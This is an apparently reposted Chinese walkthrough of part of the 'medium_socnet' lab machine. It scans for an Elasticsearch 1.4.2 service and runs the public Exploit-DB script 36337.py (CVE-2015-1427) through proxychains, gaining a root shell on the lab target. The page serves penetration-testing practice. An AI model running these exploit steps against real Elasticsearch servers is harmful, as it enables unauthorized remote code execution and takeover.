浙江龙网

  1. 首页 > 生活百科 > >

靶机: medium_socnet( 五 )

生活百科

  • 发现新线索,172.17.0.2 的 9200 端口开启,运行服务 Elasticsearch REST API 1.4.2 (name: Watcher; cluster: elasticsearch; Lucene 4.10.2) 说明:Elasticsearch 是位于 Elastic Stack 核心的分布式搜索和分析引擎
  • 此处我们可以使用 searchsploit 查询 Elasticsearch 相关漏洞并尝试,攻入其中
    ──(kali?kali)-[~/Workspace]└─$ searchsploit Elasticse130 ?----------------------------------------------------------------------------------------- ---------------------------------Exploit Title|Path----------------------------------------------------------------------------------------- ---------------------------------ElasticSearch - Remote Code Execution| linux/remote/36337.pyElasticSearch - Remote Code Execution| multiple/webapps/33370.htmlElasticSearch - Search Groovy Sandbox Bypass (Metasploit)| java/remote/36415.rbElasticSearch 1.6.0 - Arbitrary File Download| linux/webapps/38383.pyElasticSearch 7.13.3 - Memory disclosure| multiple/webapps/50149.pyElasticSearch < 1.4.5 / < 1.5.2 - Directory Traversal| php/webapps/37054.pyElasticSearch Dynamic Script - Arbitrary Java Execution (Metasploit)| java/remote/33588.rbElasticsearch ECE 7.13.3 - Anonymous Database Dump| multiple/webapps/50152.py----------------------------------------------------------------------------------------- ---------------------------------Shellcodes: No Results
  • 尝试一个 /usr/share/exploitdb/exploits/linux/remote/36337.py 但注意是否安装 python2 以及其 requests 如果没有使用以下代码
    sudo apt-get install python2# 安装 python2wget https://bootstrap.pypa.io/pip/2.7/get-pip.py && python2 get-pip.py# 安装 python2 的 pip2 如果有就跳过此步python2 -m pip install requests# 安装 requests 包proxychains4 -f ./proxychains.conf python2 /usr/share/exploitdb/exploits/linux/remote/36337.py 172.17.0.2# 利用 36337.py 脚本进入其中
    ──(kali?kali)-[~/Workspace]└─$ proxychains4 -f ./proxychains.conf python2 36337.py 172.17.0.2[proxychains] config file found: ./proxychains.conf[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4[proxychains] DLL init: proxychains-ng 4.16▓███████▓▄▄▄██████ ▄▄▄█████▓ ██▓ ▄████▄████████? ██ ▓███████▓██▓▓█? ▓██??████▄?██? ▓██? ▓?▓██??██? ?█?██? ▓██? ██?▓█? ▓██?▓██??███?██??██?█▄? ▓██▄? ▓██? ???██??▓█▄ ? ▓██▄?██??██??███?██??██??▓█▄ ?██??██▄▄▄▄██?██?? ▓██▓ ? ?██??▓▓▄ ▄██??██??▓█ ?██ ?▓█▄ ?██??██???████??██████?▓█▓██??██████???██? ? ?██?? ▓███? ??██████???▓█??██▓??████??██████??██████??? ?? ?? ??▓???▓?█?? ?▓? ? ?? ???▓? ?? ??? ?▓? ? ? ? ??????? ?? ?? ??▓?? ??▓?? ??? ? ?? ??? ?? ??? ??? ???? ??? ? ? ??? ? ? ??? ? ??? ? ???? ???????? ???????? ??? ?? ?????????? ????????????Exploit for ElasticSearch , CVE-2015-1427Version: 20150309.1{*} Spawning Shell on target... Do note, its only semi-interactive... Use it to drop a better payload or something~$可以看到下面报错了,查看错误是 ElasticSearch Groovy 沙盒绕过 && 代码执行漏洞(CVE-2015-1427) 想要要利用需要先查询时至少要求es中有一条数据,所以发送如下数据包,增加一个数据
    ┌──(kali?kali)-[~/Workspace]└─$ proxychains python2 a.py 172.17.0.2[proxychains] config file found: /etc/proxychains4.conf[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4[proxychains] DLL init: proxychains-ng 4.16▓███████▓▄▄▄██████ ▄▄▄█████▓ ██▓ ▄████▄████████? ██ ▓███████▓██▓▓█? ▓██??████▄?██? ▓██? ▓?▓██??██? ?█?██? ▓██? ██?▓█? ▓██?▓██??███?██??██?█▄? ▓██▄? ▓██? ???██??▓█▄ ? ▓██▄?██??██??███?██??██??▓█▄ ?██??██▄▄▄▄██?██?? ▓██▓ ? ?██??▓▓▄ ▄██??██??▓█ ?██ ?▓█▄ ?██??██???████??██████?▓█▓██??██████???██? ? ?██?? ▓███? ??██████???▓█??██▓??████??██████??██████??? ?? ?? ??▓???▓?█?? ?▓? ? ?? ???▓? ?? ??? ?▓? ? ? ? ??????? ?? ?? ??▓?? ??▓?? ??? ? ?? ??? ?? ??? ??? ???? ??? ? ? ??? ? ? ??? ? ??? ? ???? ???????? ???????? ??? ?? ?????????? ????????????Exploit for ElasticSearch , CVE-2015-1427Version: 20150309.1{*} Spawning Shell on target... Do note, its only semi-interactive... Use it to drop a better payload or something~$ id[proxychains] Strict chain...127.0.0.1:1080...172.17.0.2:9200...OKuid=0(root) gid=0(root) groups=0(root)~$

    推荐阅读


    上一篇:三 Selenium+Python系列 - 常见浏览器操作

    下一篇:微服务组件--限流框架Spring Cloud Hystrix分析